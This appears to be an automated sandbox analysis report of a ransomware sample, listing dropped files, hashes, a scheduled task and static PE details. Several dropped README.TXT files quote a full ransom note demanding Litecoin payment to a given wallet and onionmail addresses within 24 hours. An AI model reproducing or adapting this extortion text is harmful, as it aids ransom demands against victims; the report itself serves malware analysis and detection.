                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Favorites\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Links\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Music\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\OneDrive\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Pictures\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Recent\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Saved Games\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Searches\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1467
                                                                                                                                                                                                                                                Entropy (8bit):7.868947085195471
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:SgtiM/ALrw+GH6BKUKz8QKGYpZZYN9qjmJrc0YXUZtwsTmly:mCAfKUKz+604o0jZtw1ly
                                                                                                                                                                                                                                                MD5:F235EEA8CDA20810F2BF0A62A70C740B
                                                                                                                                                                                                                                                SHA1:501245C8366294008F8D43DF858CE4C01BE750E7
                                                                                                                                                                                                                                                SHA-256:87323B9DDA1B7705CE432A038A8E8B1F8B6F6DBCE364567D3FC6F244BDE84BFF
                                                                                                                                                                                                                                                SHA-512:0D955F7FC51F7FDDCBBE5A2DD592CAED1740B93B407B92CCE3D19492E83C5DEEBADB1AC99A471351EE5459FA299B71392D34E3F6F7037972163211263EC4B8B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....rcW._................\.M...O.....V...4...;.".u"...w..5..*.!=....Z1.....{G.e....[...}.Kr.V.M_Jz....^\...........Ilv..)......G...,Ho.lc...7...._.....:.E,u...G...<..E.)d8..N.C\...g......BK\0.w......"...E./....#.......*.7u..@...S.9.z...H..Oa......K@..|.@....B.x......(Q}.c..04.\..&.PN..S.{...Y.Ph,.... @k..K.i...CG.S.M..",`..e....H.....b@N8.=O..xp.Z..$).#k>....#...R..j..;.Vc.[.k...SQ.......9b.....#/...|O(...0..5+......%.{LE.gT.k....D.R..#}.*..s....U..}J.x..u[.;........Z....va..._.D!..X;\.djs.e..).i@_.s.M.... .!.%H....+..1rm...0^&..!If.LppG;....bK...@}....b.XU..~.q8B.?4.....s...B......'..Ul..O.A.q.c......l.R.K.W.`S.Q.....f...y6...*....J<6.........|u...#......xi...'[-...Wl...;}..R.....b.`*.}.q......0D.k...?...3H.j.!Qz..PO(..........l....x.g'.~..eP....m.?.."7S.!..+......\.E...#i..c.4{.p..Pd.............FO ..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....

                                                                                                                                                                                                                                                C:\Users\user\Videos\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\_curlrc

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):616
                                                                                                                                                                                                                                                Entropy (8bit):7.624496724953692
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:VggjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZpku:VRjmJrc0YXUZtwsT1
                                                                                                                                                                                                                                                MD5:C3B7E0F514A4D6094109B50131719DD1
                                                                                                                                                                                                                                                SHA1:92AFA6B30409B6154BA3A6CE788FDDE8F2F6CA04
                                                                                                                                                                                                                                                SHA-256:EAA7F0E2B1AA47A258EAC6791EC2236836234A3F18A930018A3095EC957320B7
                                                                                                                                                                                                                                                SHA-512:DC6867781CB799690555CDC86144BA3D69D07A667A4F431087AC5D6577E52D9B1EEFAF1D0FD8302FF73A4B8684B31241F408C4EF01CFF830CD30878CC690BA1E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:........>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.0...ITug.....>-.B...T<*.&.R.....H.....................fk.W...f

                                                                                                                                                                                                                                                C:\Users\user\_curlrc.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):616
                                                                                                                                                                                                                                                Entropy (8bit):7.624496724953692
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:VggjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZpku:VRjmJrc0YXUZtwsT1
                                                                                                                                                                                                                                                MD5:C3B7E0F514A4D6094109B50131719DD1
                                                                                                                                                                                                                                                SHA1:92AFA6B30409B6154BA3A6CE788FDDE8F2F6CA04
                                                                                                                                                                                                                                                SHA-256:EAA7F0E2B1AA47A258EAC6791EC2236836234A3F18A930018A3095EC957320B7
                                                                                                                                                                                                                                                SHA-512:DC6867781CB799690555CDC86144BA3D69D07A667A4F431087AC5D6577E52D9B1EEFAF1D0FD8302FF73A4B8684B31241F408C4EF01CFF830CD30878CC690BA1E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:........>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.0...ITug.....>-.B...T<*.&.R.....H.....................fk.W...f

                                                                                                                                                                                                                                                C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):284
                                                                                                                                                                                                                                                Entropy (8bit):3.410959089057151
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:RVejbXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lZtit0:zQf2RKQ1CGAFAjzvYRQVZtit0
                                                                                                                                                                                                                                                MD5:804015A8A9FB14E561A9A10B3998E978
                                                                                                                                                                                                                                                SHA1:245A6DD57FFFB0C9F9BAF00BF4D974585217B035
                                                                                                                                                                                                                                                SHA-256:F0451DC18B2D9349197F02A1BA239D9DB1F62C63A023F8D14158BBF4D6D6436C
                                                                                                                                                                                                                                                SHA-512:2820D5475D02AED158AA9F3130B85141270166B7F742AF6D6D367FB0E3BF5C68C2B693E5FED0D4ADB45E3941C4A9EDDACFFBCC9DC5263EDA23480391CFD2E840
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......v....L..|-.t?.F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................4.@3P.........................

                                                                                                                                                                                                                                                \Device\ConDrv

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):454
                                                                                                                                                                                                                                                Entropy (8bit):4.817249405672311
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:pMpDh5RwXf7oyTgMFyYiHyjq4QhuhZAI0l3Nh+n:pMdLwXf7oyTpAHyjqjhuhZAIE3un
                                                                                                                                                                                                                                                MD5:CD59E3838538C75C62F94BC1FCF4C1FA
                                                                                                                                                                                                                                                SHA1:4F8F37E1E1C0367DD852CA3557800EF123BA0707
                                                                                                                                                                                                                                                SHA-256:E1BCCB254C6495E9B42E9DDFACB828798E496A79E3C970CA01535C4B655697A9
                                                                                                                                                                                                                                                SHA-512:F450F73CD9A174E263FAE101C62B7847BC3E8729B29687EBD61CA0CFC7507509E21515ABA0FF8A15575D2C312655BF9761A23C343D32732C8BD5A94EA4080A24
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 3473559 bytes (3393 KiB)....Extracting archive: extracted\file_7.zip..--..Path = extracted\file_7.zip..Type = zip..Physical Size = 3473559.... 0%. . 56% 1. . 56% 1 - file_6.zip. . 59% 1 - file_6.zip. .Everything is Ok....Files: 2..Size: 4156077..Compressed: 3473559..

                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):6.589089679322374
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                                File size:3'223'040 bytes
                                                                                                                                                                                                                                                MD5:197f7a10814e446ee3d649f2509b1608
                                                                                                                                                                                                                                                SHA1:a459ec5320318e01318105d8e87e707ea480a4c7
                                                                                                                                                                                                                                                SHA256:b4ab50c0c3a89046764d4b805c9c4cf5cbe6ae07aa2eddb5e445c11479a912ce
                                                                                                                                                                                                                                                SHA512:b595f5b8de7ecf96cb18f9f1de10bbb4988bb9b6412e1837b49469b78f7f15bbae661b8092b1d46fa6d2bdfeaa5f0e8e0f493c70dbe7d94c66cba325d83e6c85
                                                                                                                                                                                                                                                SSDEEP:49152:yZ1m9In5PVRjbnKSoNK1yoJFk/yUXeo7HH4MBQC+kQFw:yZ0In9V1nKR4yiFkqUX0C+9w
                                                                                                                                                                                                                                                TLSH:9CE529B67996A1CFE8CB17F89427CE81695C42B907150AC3BD58E4FA7D62CC065B3C2C
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Entrypoint:0x713000
                                                                                                                                                                                                                                                Entrypoint Section:.taggant
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x400000
